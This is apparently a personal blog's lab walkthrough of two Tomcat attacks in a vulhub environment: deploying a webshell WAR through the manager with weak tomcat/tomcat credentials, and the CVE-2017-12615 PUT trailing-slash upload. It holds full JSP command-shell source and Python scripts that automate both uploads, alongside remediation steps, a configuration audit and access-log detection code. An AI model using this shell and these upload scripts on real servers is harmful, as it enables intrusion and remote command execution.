[面包]MrTwoC


Hello, and welcome to this blockchain-based personal blog. Name: 面包 (Bread) / MrTwoc. Hobbies: running (5/10 km), coffee, games (MMORPG, FPS, Minecraft, Warframe). Interests: Rust, blockchain, network security, quantum information (quantum computing), game design and development.

Tomcat File Upload Vulnerability

Environment: CentOS 7, Tomcat (vulhub docker images), Docker
Required tools: a Java environment (the jar command from the JDK), IceScorpion (冰蝎, also known as Behinder)

Weak Password Exploitation and Upload

File location on the virtual machine:
/root/CVE/vulhub-master/tomcat/tomcat8
Start the environment with docker-compose from that directory:
docker-compose up -d
Then find the virtual machine's IP address and open it from the host machine; Tomcat listens on port 8080 by default (here http://192.168.1.4:8080).
The default page has a "Manager App" button in the upper right corner.
Log in with the weak credentials: username tomcat, password tomcat. In Tomcat 8 the HTML manager requires the manager-gui role, which this lab account holds.
The manager page contains a "WAR file to deploy" upload section.
Next open IceScorpion to prepare the shell: select default_aes and click to generate the server-side files. A folder opens automatically containing the shell files for each server type.
Open cmd in that folder, take shell.jsp, and package it into a WAR with the jar tool:
jar cvf shell.war .\shell.jsp
This produces shell.war, which Tomcat deploys as a web application under the context path /shell. Upload it through the manager; on success the manager reports OK and lists the new application.
Verify by opening the deployed JSP:
http://192.168.1.4:8080/shell/shell.jsp
Once it responds, open IceScorpion, click add, enter that address, and connect.
This yields a shell on the Tomcat host, running with the privileges of the Tomcat process.
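The same upload, scripted: the following is an added example (not the post's or IceScorpion's code) that packages a JSP into a WAR in memory, exactly as jar cvf does, and deploys it through the Tomcat Manager text interface with HTTP basic auth instead of the HTML form. It assumes the target http://192.168.1.4:8080, the credentials tomcat/tomcat, and that this account also holds the manager-script role, which /manager/text/ requires; the JSP body is a constructed placeholder, not the IceScorpion shell.

```python
"""Build a WAR around one JSP and deploy it via the Tomcat Manager text interface.

Added example; target address, credentials and the manager-script role are
assumptions, and SAMPLE_JSP is a constructed placeholder.
"""
import base64
import io
import urllib.request
import zipfile

# Constructed placeholder payload; in the walkthrough this is the shell.jsp
# generated by IceScorpion.
SAMPLE_JSP = b'<%= "deployed" %>\n'


def build_war(jsp_name: str, jsp_bytes: bytes) -> bytes:
    """Return WAR bytes holding META-INF/MANIFEST.MF and the JSP at the root.

    This is the minimal archive `jar cvf shell.war shell.jsp` produces; Tomcat
    deploys it without a WEB-INF/web.xml.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n")
        war.writestr(jsp_name, jsp_bytes)
    return buf.getvalue()


def war_entries(war_bytes: bytes) -> list:
    """List the archive members (used to check the WAR before uploading)."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def deploy_request(base_url: str, context_path: str, war_bytes: bytes,
                   username: str, password: str) -> urllib.request.Request:
    """Manager text-interface deploy: PUT the WAR body to /manager/text/deploy.

    Equivalent to:
      curl -u user:pass -T shell.war "http://host:8080/manager/text/deploy?path=/shell&update=true"
    """
    url = f"{base_url}/manager/text/deploy?path={context_path}&update=true"
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = urllib.request.Request(url, data=war_bytes, method="PUT")
    req.add_header("Authorization", f"Basic {token}")
    req.add_header("Content-Type", "application/octet-stream")
    return req


def deploy(base_url: str, context_path: str, war_bytes: bytes,
           username: str, password: str) -> str:
    """Send the deploy request; the manager replies with a line starting 'OK -' on success."""
    req = deploy_request(base_url, context_path, war_bytes, username, password)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace").strip()


if __name__ == "__main__":
    war = build_war("shell.jsp", SAMPLE_JSP)
    print(war_entries(war))
    # Network call against the lab host (assumed address and credentials).
    print(deploy("http://192.168.1.4:8080", "/shell", war, "tomcat", "tomcat"))
```

After a successful deploy the JSP is reachable at /shell/shell.jsp, the same address the walkthrough opens in the browser. If the account only has manager-gui, the text interface answers 403 and the HTML form (with its CSRF nonce) is the only route.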

Remediation Plan
1. Change the weak password (on its own this is only a stop-gap: the manager stays reachable and can still be brute-forced).
2. Run Tomcat as a dedicated low-privilege system user with only the permissions it needs (no remote login, no write access outside its own work and log directories), so that a deployed shell inherits as little as possible.
3. Strengthen authentication (local and certificate-based) and add account lockout. Tomcat's LockOutRealm, configured in CATALINA_HOME/conf/server.xml and wrapping the UserDatabaseRealm in the default server.xml of Tomcat 7 and later, locks an account after repeated failed logins; session timeouts are set in CATALINA_HOME/conf/web.xml. Where authentication is centralised, configure the directory service's lockout policy accordingly.
4. Grant the manager roles (manager-gui, manager-status, manager-script, manager-jmx) on a least-privilege basis: give each account only the role it needs, keep manager-gui and manager-script on separate accounts as the Tomcat manager documentation recommends, and restrict the /manager context to administrative hosts (recent Tomcat versions ship a RemoteAddrValve in the manager's META-INF/context.xml that allows only localhost by default).
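To make the remediation list checkable, here is an added example (not part of the original post) that audits the relevant settings offline. It runs over constructed fragments of tomcat-users.xml, server.xml and conf/web.xml: the WEAK_* fragments mirror the lab (tomcat/tomcat with both manager roles, no LockOutRealm, PUT enabled through readonly=false), the HARDENED_* fragments show the corrected settings. User names, passwords and lockout values are illustrative.

```python
"""Offline audit of Tomcat manager hardening settings (added example).

All XML below is constructed for illustration; the hardened user names,
passwords and LockOutRealm values are assumptions, not Tomcat defaults.
"""
import xml.etree.ElementTree as ET

WEAK_USERS = """<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
</tomcat-users>"""

HARDENED_USERS = """<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="ops-gui" password="Vq8#tL2n!mR5zWp4Xc" roles="manager-gui"/>
  <user username="ci-deploy" password="Hs3$kP9v@bN7yQe1Tz" roles="manager-script"/>
</tomcat-users>"""

WEAK_SERVER = """<Server><Service><Engine>
  <Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase"/>
</Engine></Service></Server>"""

# LockOutRealm wraps the real realm; 5 failures lock the account for 600 s.
HARDENED_SERVER = """<Server><Service><Engine>
  <Realm className="org.apache.catalina.realm.LockOutRealm" failureCount="5" lockOutTime="600">
    <Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase"/>
  </Realm>
</Engine></Service></Server>"""

# DefaultServlet section of conf/web.xml. readonly=false is what lets PUT
# write files (the setup behind the CVE-2017-12615 section); the default is true.
WEAK_WEB = """<web-app><servlet>
  <servlet-name>default</servlet-name>
  <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
  <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
</servlet></web-app>"""

HARDENED_WEB = """<web-app><servlet>
  <servlet-name>default</servlet-name>
  <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
</servlet></web-app>"""

# Small constructed list of default/common passwords to flag.
COMMON_WEAK = {"tomcat", "admin", "password", "123456", "s3cret", "manager"}


def _roles(user) -> set:
    return {r.strip() for r in user.get("roles", "").split(",") if r.strip()}


def weak_manager_accounts(tomcat_users_xml: str) -> list:
    """Users with any manager-* role whose password equals the username,
    is a common default, or is shorter than 12 characters."""
    found = []
    for user in ET.fromstring(tomcat_users_xml).iter("user"):
        if not any(r.startswith("manager-") for r in _roles(user)):
            continue
        name, pw = user.get("username", ""), user.get("password", "")
        if pw == name or pw.lower() in COMMON_WEAK or len(pw) < 12:
            found.append(name)
    return found


def shared_gui_and_script(tomcat_users_xml: str) -> list:
    """Users holding both manager-gui and manager-script; Tomcat advises separate accounts."""
    return [user.get("username")
            for user in ET.fromstring(tomcat_users_xml).iter("user")
            if {"manager-gui", "manager-script"} <= _roles(user)]


def lockout_realm_configured(server_xml: str) -> bool:
    """True if any Realm in server.xml is a LockOutRealm (nested realms included)."""
    return any(r.get("className", "").endswith(".LockOutRealm")
               for r in ET.fromstring(server_xml).iter("Realm"))


def default_servlet_writable(web_xml: str) -> bool:
    """True if the DefaultServlet has readonly=false, i.e. HTTP PUT/DELETE can write files."""
    for servlet in ET.fromstring(web_xml).iter("servlet"):
        if not servlet.findtext("servlet-class", "").endswith(".DefaultServlet"):
            continue
        for p in servlet.iter("init-param"):
            if p.findtext("param-name", "").strip() == "readonly":
                return p.findtext("param-value", "").strip().lower() == "false"
    return False  # readonly defaults to true when the init-param is absent


def audit(users_xml: str, server_xml: str, web_xml: str) -> dict:
    return {
        "weak_manager_accounts": weak_manager_accounts(users_xml),
        "gui_and_script_on_one_user": shared_gui_and_script(users_xml),
        "lockout_realm": lockout_realm_configured(server_xml),
        "put_enabled": default_servlet_writable(web_xml),
    }


if __name__ == "__main__":
    print("lab:     ", audit(WEAK_USERS, WEAK_SERVER, WEAK_WEB))
    print("hardened:", audit(HARDENED_USERS, HARDENED_SERVER, HARDENED_WEB))
```

Pointing the four checks at a real CATALINA_HOME/conf directory is a matter of reading the three files; the lab configuration fails all four, the hardened one passes all four.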

CVE-2017-12615 - Remote Code Execution

Start the vulhub CVE-2017-12615 environment in the same way and open it in the browser. Clicking the Manager App is refused in this environment, so the weak-password route from the previous section is not available.
A note on the identifier: the official CVE-2017-12615 advisory covers Tomcat 7.0.0 to 7.0.79 on Windows; the same PUT-based upload on the 7.0.81, 8.0.x, 8.5.x and 9.0.x lines was fixed as CVE-2017-12617. Both require the DefaultServlet's readonly init-param in conf/web.xml to be set to false, which is not the default.
Now open Burp Suite and prepare the POC below, a minimal JSP command shell that only runs a command when the request carries pwd=023:

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!
// Run a system command and return its standard output as one string
public static String excuteCmd(String c) {
    StringBuilder line = new StringBuilder();
    try {
        Process pro = Runtime.getRuntime().exec(c);
        BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
        String temp = null;
        while ((temp = buf.readLine()) != null) {
            line.append(temp + "\n");
        }
        buf.close();
    } catch (Exception e) {
        line.append(e.getMessage());
    }
    return line.toString();
}
%>
<%
// Password check, then run the cmd parameter; anything else gets a smiley
if ("023".equals(request.getParameter("pwd")) && !"".equals(request.getParameter("cmd"))) {
    out.println("<pre>" + excuteCmd(request.getParameter("cmd")) + "</pre>");
} else {
    out.println(":-)");
}
%>

Intercept a request to the site and send it to Repeater.
Change the request line from GET / to PUT /1.jsp/ and paste the POC above as the request body (Burp updates Content-Length for you; it must match the body exactly). The trailing slash is what makes the write possible: the DefaultServlet accepts PUT when its readonly init-param is false, and because the path no longer ends in .jsp the JspServlet mapping does not intercept it; when Tomcat turns the path into a filesystem path the trailing slash is dropped, so the file lands as 1.jsp in the web root.
A 201 Created status means the file was written. Open the address and pass the password and a command:
http://192.168.1.4:8080/1.jsp?pwd=023&cmd=id
The output of id comes back in the page, which confirms command execution as the Tomcat user.

As in the first section, the POC body can be replaced with the IceScorpion shell.jsp to get a full interactive shell instead of one command per request.
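The request above, scripted, together with what it looks like from the defender's side: an added example that is not part of the original post. It builds the raw PUT with the trailing-slash path, parses the status line, forms the pwd/cmd URL, and flags the upload in Tomcat access-log lines (default AccessLogValve pattern %h %l %u %t "%r" %s %b). The host, file name and log lines are constructed; the only network call, send_raw, is commented out in the main block so everything else runs offline.

```python
"""CVE-2017-12615-style PUT upload: request builder, reply parser and access-log detection.

Added example. The target address 192.168.1.4:8080, the file name 1.jsp and
SAMPLE_LOG are constructed for illustration.
"""
import socket
from urllib.parse import urlencode

# Constructed stand-in for the JSP shell; the real body is the POC above.
SAMPLE_JSP = b'<%= "hello" %>'


def build_put_request(host: str, port: int, path: str, body: bytes) -> bytes:
    """Raw HTTP/1.1 PUT to a path such as '/1.jsp/' (trailing slash bypasses JspServlet).

    Content-Length must equal the body length, otherwise Tomcat waits for more
    data or writes a truncated file.
    """
    head = (
        f"PUT {path} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Connection: close\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    )
    return head.encode("ascii") + body


def parse_status(response: bytes) -> int:
    """Numeric status code of a raw HTTP response; 201 means the file was written."""
    status_line = response.split(b"\r\n", 1)[0]
    return int(status_line.split(b" ")[1])


def command_url(base: str, pwd: str, cmd: str, name: str = "1.jsp") -> str:
    """URL that runs `cmd` through the uploaded JSP; the query string is URL-encoded."""
    return f"{base}/{name}?" + urlencode({"pwd": pwd, "cmd": cmd})


def send_raw(host: str, port: int, request: bytes) -> bytes:
    """Send the raw request and return the full raw response (network call)."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Defender side. With the default AccessLogValve pattern a successful upload is a
# PUT outside /manager/ answered with 201; the DefaultServlet should never see PUT.
def suspicious_put_lines(log_lines) -> list:
    """Return (path, status) for every PUT that did not go to the manager application."""
    hits = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 3:
            continue
        request_tokens = parts[1].split(" ")          # e.g. PUT /1.jsp/ HTTP/1.1
        status_tokens = parts[2].split()
        if len(request_tokens) < 2 or not status_tokens:
            continue
        method, path = request_tokens[0], request_tokens[1]
        if method == "PUT" and not path.startswith("/manager/"):
            hits.append((path, int(status_tokens[0])))
    return hits


# Constructed access-log lines: one upload, one command, one legitimate manager deploy.
SAMPLE_LOG = [
    '192.168.1.10 - - [05/Jan/2024:10:12:30 +0800] "GET / HTTP/1.1" 200 11156',
    '192.168.1.10 - - [05/Jan/2024:10:12:33 +0800] "PUT /1.jsp/ HTTP/1.1" 201 -',
    '192.168.1.10 - - [05/Jan/2024:10:12:40 +0800] "GET /1.jsp?pwd=023&cmd=id HTTP/1.1" 200 61',
    '192.168.1.10 - tomcat [05/Jan/2024:10:15:01 +0800] "PUT /manager/text/deploy?path=/app HTTP/1.1" 200 47',
]


if __name__ == "__main__":
    host, port = "192.168.1.4", 8080
    req = build_put_request(host, port, "/1.jsp/", SAMPLE_JSP)
    print(req.decode())
    print(command_url(f"http://{host}:{port}", "023", "id"))
    print(suspicious_put_lines(SAMPLE_LOG))
    # Against the lab host only:
    # print(parse_status(send_raw(host, port, req)))
```

The detection deliberately keys on the method and path rather than the .jsp suffix, so variants that hide the extension behind a trailing slash, an encoded space or a different file name still show up; a PUT that the DefaultServlet answers with 201 or 204 is the signal that readonly=false is in effect.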
